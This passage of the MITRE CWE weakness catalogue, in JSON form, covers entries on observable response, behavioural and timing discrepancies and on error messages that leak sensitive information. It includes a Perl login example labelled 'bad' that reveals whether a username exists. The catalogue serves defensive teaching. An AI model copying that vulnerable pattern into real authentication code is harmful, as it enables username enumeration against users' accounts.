Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Alternate_Terms, Common_Consequences, Demonstrative_Examples, Description, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Name, Potential_Mitigations, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Name":"Nicole Fern","Contribution_Organization":"Tortuga Logic","Contribution_Date":"2020-06-03","Contribution_Comment":"Provided Demonstrative Example for cache timing attack"},"Previous_Entry_Name":[{"#text":"Discrepancy Information Leaks","attr":{"@_Date":"2009-12-28"}},{"#text":"Information Exposure Through Discrepancy","attr":{"@_Date":"2020-02-24"}},{"#text":"Observable Discrepancy","attr":{"@_Date":"2020-08-20"}},{"#text":"Observable Differences in Behavior to Error Inputs","attr":{"@_Date":"2020-12-10"}}]}},"204":{"attr":{"@_ID":"204","@_Name":"Observable Response Discrepancy","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product provides different responses to incoming requests in a way that reveals internal state information to an unauthorized actor outside of the intended control sphere.","Extended_Description":"This issue frequently occurs during authentication, where a difference in failed-login messages could allow an attacker to determine if the username is valid or not. These exposures can be inadvertent (bug) or intentional (design).","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"203","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control"],"Impact":["Read Application Data","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}},{"attr":{"@_Mitigation_ID":"MIT-39"},"Phase":"Implementation","Description":{"xhtml:p":["Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success.","If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files.","Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-38"},"Intro_Text":"The following code checks validity of the supplied username and password and notifies the user of a successful or failed login.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $username=param(\'username\');my $password=param(\'password\');if (IsValidUsername($username) == 1){}else{}","xhtml:br":["","","","","",""],"xhtml:div":[{"#text":"if (IsValidPassword($username, $password) == 1){}else{}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":[{"#text":"print \\"Login Successful\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"print \\"Login Failed - incorrect password\\";","attr":{"@_style":"margin-left:10px;"}}]},{"#text":"print \\"Login Failed - unknown username\\";","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"result"},"xhtml:div":"\\"Login Failed - incorrect username or password\\""}],"Body_Text":["In the above code, there are different messages for when an incorrect username is supplied, versus when the username is correct but the password is wrong. This difference enables a potential attacker to understand the state of the login function, and could allow an attacker to discover a valid username by trying different values until the incorrect password message is returned. In essence, this makes it easier for an attacker to obtain half of the necessary authentication credentials.","While this type of information may be helpful to a user, it is also useful to a potential attacker. In the above example, the message for both failed cases should be the same, such as:"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-2094","Description":"This, and others, use \\"..\\" attacks and monitor error responses, so there is overlap with directory traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2094"},{"Reference":"CVE-2001-1483","Description":"Enumeration of valid usernames based on inconsistent responses","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1483"},{"Reference":"CVE-2001-1528","Description":"Account number enumeration via inconsistent responses.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1528"},{"Reference":"CVE-2004-2150","Description":"User enumeration via discrepancies in error messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2150"},{"Reference":"CVE-2005-1650","Description":"User enumeration via discrepancies in error messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1650"},{"Reference":"CVE-2004-0294","Description":"Bulletin Board displays different error messages when a user exists or not, which makes it easier for remote attackers to identify valid users and conduct a brute force password guessing attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0294"},{"Reference":"CVE-2004-0243","Description":"Operating System, when direct remote login is disabled, displays a different message if the password is correct, which allows remote attackers to guess the password via brute force methods.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0243"},{"Reference":"CVE-2002-0514","Description":"Product allows remote attackers to determine if a port is being filtered because the response packet TTL is different than the default TTL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0514"},{"Reference":"CVE-2002-0515","Description":"Product sets a different TTL when a port is being filtered than when it is not being filtered, which allows remote attackers to identify filtered ports by comparing TTLs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0515"},{"Reference":"CVE-2001-1387","Description":"Product may generate different responses than specified by the administrator, possibly leading to an information leak.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1387"},{"Reference":"CVE-2004-0778","Description":"Version control system allows remote attackers to determine the existence of arbitrary files and directories via the -X command for an alternate history file, which causes different error messages to be returned.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0778"},{"Reference":"CVE-2004-1428","Description":"FTP server generates an error message if the user name does not exist instead of prompting for a password, which allows remote attackers to determine valid usernames.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1428"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Response discrepancy infoleak"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 12: Information Leakage.&#34; Page 191"}}},"Notes":{"Note":{"#text":"can overlap errors related to escalated privileges","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description, Name, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Response Discrepancy Information Leak","attr":{"@_Date":"2010-09-27"}},{"#text":"Response Discrepancy Information Exposure","attr":{"@_Date":"2020-02-24"}}]}},"205":{"attr":{"@_ID":"205","@_Name":"Observable Behavioral Discrepancy","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product\'s behaviors indicate important differences that may be observed by unauthorized actors in a way that reveals (1) its internal state or decision process, or (2) differences from other products with equivalent functionality.","Extended_Description":"Ideally, a product should provide as little information about its internal operations as possible.  Otherwise, attackers could use knowledge of these internal operations to simplify or optimize their attack.  In some cases, behavioral discrepancies can be used by attackers to form a side channel.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"203","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"514","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control"],"Impact":["Read Application Data","Bypass Protection Mechanism"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0208","Description":"Product modifies TCP/IP stack and ICMP error messages in unusual ways that show the product is in use.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0208"},{"Reference":"CVE-2004-2252","Description":"Behavioral infoleak by responding to SYN-FIN packets.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2252"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Behavioral Discrepancy Infoleak"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":45,"Entry_Name":"Fingerprinting"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Behavioral Discrepancy Information Leak","attr":{"@_Date":"2009-12-28"}},{"#text":"Information Exposure Through Behavioral Discrepancy","attr":{"@_Date":"2020-02-24"}}]}},"206":{"attr":{"@_ID":"206","@_Name":"Observable Internal Behavioral Discrepancy","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product performs multiple behaviors that are combined to produce a single result, but the individual behaviors are observable separately in a way that allows attackers to reveal internal state or internal decision points.","Extended_Description":"Ideally, a product should provide as little information as possible to an attacker.  Any hints that the attacker may be making progress can then be used to simplify or optimize the attack.  For example, in a login procedure that requires a username and password, ultimately there is only one decision: success or failure.  However, internally, two separate actions are performed: determining if the username exists, and checking if the password is correct.  If the product behaves differently based on whether the username exists or not, then the attacker only needs to concentrate on the password.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"205","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control"],"Impact":["Read Application Data","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":{"Description":"Setup generic response pages for error conditions. The error page should not disclose information about the success or failure of a sensitive operation. For instance, the login page should not confirm that the login is correct and the password incorrect. The attacker who tries random account name may be able to guess some of them. Confirming that the account exists would make the login page more susceptible to brute force attack."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-2031","Description":"File existence via infoleak monitoring whether \\"onerror\\" handler fires or not.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2031"},{"Reference":"CVE-2005-2025","Description":"Valid groupname enumeration via behavioral infoleak (sends response if valid, doesn\'t respond if not).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2025"},{"Reference":"CVE-2001-1497","Description":"Behavioral infoleak in GUI allows attackers to distinguish between alphanumeric and non-alphanumeric characters in a password, thus reducing the search space.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1497"},{"Reference":"CVE-2003-0190","Description":"Product immediately sends an error message when user does not exist instead of waiting until the password is provided, allowing username enumeration.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0190"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Internal behavioral inconsistency infoleak"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Potential_Mitigations, Relationships"}],"Previous_Entry_Name":[{"#text":"Internal Behavioral Inconsistency Information Leak","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure of Internal State Through Behavioral Inconsistency","attr":{"@_Date":"2020-02-24"}}]}},"207":{"attr":{"@_ID":"207","@_Name":"Observable Behavioral Discrepancy With Equivalent Products","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product operates in an environment in which its existence or specific identity should not be known, but it behaves differently than other products with equivalent functionality, in a way that is observable to an attacker.","Extended_Description":"For many kinds of products, multiple products may be available that perform the same functionality, such as a web server, network interface, or intrusion detection system.  Attackers often perform \\"fingerprinting,\\" which uses discrepancies in order to identify which specific product is in use.  Once the specific product has been identified, the attacks can be made more customized and efficient.  Often, an organization might intentionally allow the specific product to be identifiable.  However, in some environments, the ability to identify a distinct product is unacceptable, and it is expected that every product would behave in exactly the same way.  In these more restricted environments, a behavioral difference might pose an unacceptable risk if it makes it easier to identify the product\'s vendor, model, configuration, version, etc.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"205","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control"],"Impact":["Read Application Data","Bypass Protection Mechanism"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0208","Description":"Product modifies TCP/IP stack and ICMP error messages in unusual ways that show the product is in use.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0208"},{"Reference":"CVE-2004-2252","Description":"Behavioral infoleak by responding to SYN-FIN packets.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2252"},{"Reference":"CVE-2000-1142","Description":"Honeypot generates an error with a \\"pwd\\" command in a particular directory, allowing attacker to know they are in a honeypot system.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1142"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"External behavioral inconsistency infoleak"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships"}],"Previous_Entry_Name":[{"#text":"External Behavioral Inconsistency Information Leak","attr":{"@_Date":"2009-12-28"}},{"#text":"Information Exposure Through an External Behavioral Inconsistency","attr":{"@_Date":"2020-02-24"}}]}},"208":{"attr":{"@_ID":"208","@_Name":"Observable Timing Discrepancy","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Two separate operations in a product require different amounts of time to complete, in a way that is observable to an actor and reveals security-relevant information about the state of the product, such as whether a particular operation was successful or not.","Extended_Description":"In security-relevant contexts, even small variations in timing can be exploited by attackers to indirectly infer certain details about the product\'s internal operations.  For example, in some cryptographic algorithms, attackers can use timing differences to infer certain properties about a private key, making the key easier to guess.  Timing discrepancies effectively form a timing side channel.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"203","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"385","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"327","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control"],"Impact":["Read Application Data","Bypass Protection Mechanism"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2003-0078","Description":"SSL implementation does not perform a MAC computation if an incorrect block cipher padding is used, which causes an information leak (timing discrepancy) that may make it easier to launch cryptographic attacks that rely on distinguishing between padding and MAC verification errors, possibly leading to extraction of the original plaintext, aka the \\"Vaudenay timing attack.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0078"},{"Reference":"CVE-2000-1117","Description":"Virtual machine allows malicious web site operators to determine the existence of files on the client by measuring delays in the execution of the getSystemResource method.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1117"},{"Reference":"CVE-2003-0637","Description":"Product uses a shorter timeout for a non-existent user than a valid user, which makes it easier for remote attackers to guess usernames and conduct brute force password guessing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0637"},{"Reference":"CVE-2003-0190","Description":"Product immediately sends an error message when a user does not exist, which allows remote attackers to determine valid usernames via a timing attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0190"},{"Reference":"CVE-2004-1602","Description":"FTP server responds in a different amount of time when a given username exists, which allows remote attackers to identify valid usernames by timing the server response.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1602"},{"Reference":"CVE-2005-0918","Description":"Browser allows remote attackers to determine the existence of arbitrary files by setting the src property to the target filename and using Javascript to determine if the web page immediately stops loading, which indicates whether the file exists or not.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0918"}]},"Functional_Areas":{"Functional_Area":["Cryptography","Authentication"]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Timing discrepancy infoleak"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"462"}}},"Notes":{"Note":{"#text":"Often primary in cryptographic applications and algorithms.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Timing Discrepancy Information Leak","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Timing Discrepancy","attr":{"@_Date":"2020-02-24"}}]}},"209":{"attr":{"@_ID":"209","@_Name":"Generation of Error Message Containing Sensitive Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software generates an error message that includes sensitive information about its environment, users, or associated data.","Extended_Description":{"xhtml:p":["The sensitive information may be valuable information on its own (such as a password), or it may be useful for launching other, more serious attacks. The error message may be created in different ways:","An attacker may use the contents of error messages to help launch another, more focused attack. For example, an attempt to exploit a path traversal weakness (CWE-22) might yield the full pathname of the installed application. In turn, this could be used to select the proper number of \\"..\\" sequences to navigate to the targeted file. An attack using SQL injection (CWE-89) might not initially succeed, but an error message could reveal the malformed query, which would expose query logic and possibly even passwords or other sensitive information used within the query."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["self-generated: the source code explicitly constructs the error message and delivers it","externally-generated: the external environment, such as a language interpreter, handles the error and constructs its own message, whose contents are not under direct control by the programmer"]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"755","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"PHP","@_Prevalence":"Often"}},{"attr":{"@_Name":"Java","@_Prevalence":"Often"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"System Configuration"},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Often this will either reveal sensitive information which may be used for a later attack or private information stored in the server."}},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Analysis","Description":"This weakness generally requires domain-specific interpretation using manual analysis. However, the number of potential error conditions may be too large to cover completely within limited time constraints.","Effectiveness":"High"},{"Method":"Automated Analysis","Description":"Automated methods may be able to detect certain idioms automatically, such as exposed stack traces or pathnames, but violation of business rules or privacy requirements is not typically feasible.","Effectiveness":"Moderate"},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":{"xhtml:p":["This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results.","Error conditions may be triggered with a stress-test by calling the software simultaneously from a large number of threads or processes, and look for evidence of any unexpected behavior."]},"Effectiveness":"Moderate"},{"attr":{"@_Detection_Method_ID":"DM-12"},"Method":"Manual Dynamic Analysis","Description":"Identify error conditions that are not likely to occur during normal usage and trigger them. For example, run the program under low memory conditions, run with insufficient privileges or permissions, interrupt a transaction before it is completed, or disable connectivity to basic network services such as DNS. Monitor the software for any unexpected behavior. If you trigger an unhandled exception or similar error that was discovered and handled by the application\'s environment, it may still indicate unexpected conditions that were not handled by the application itself."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-39"},"Phase":"Implementation","Description":{"xhtml:p":["Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success.","If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log 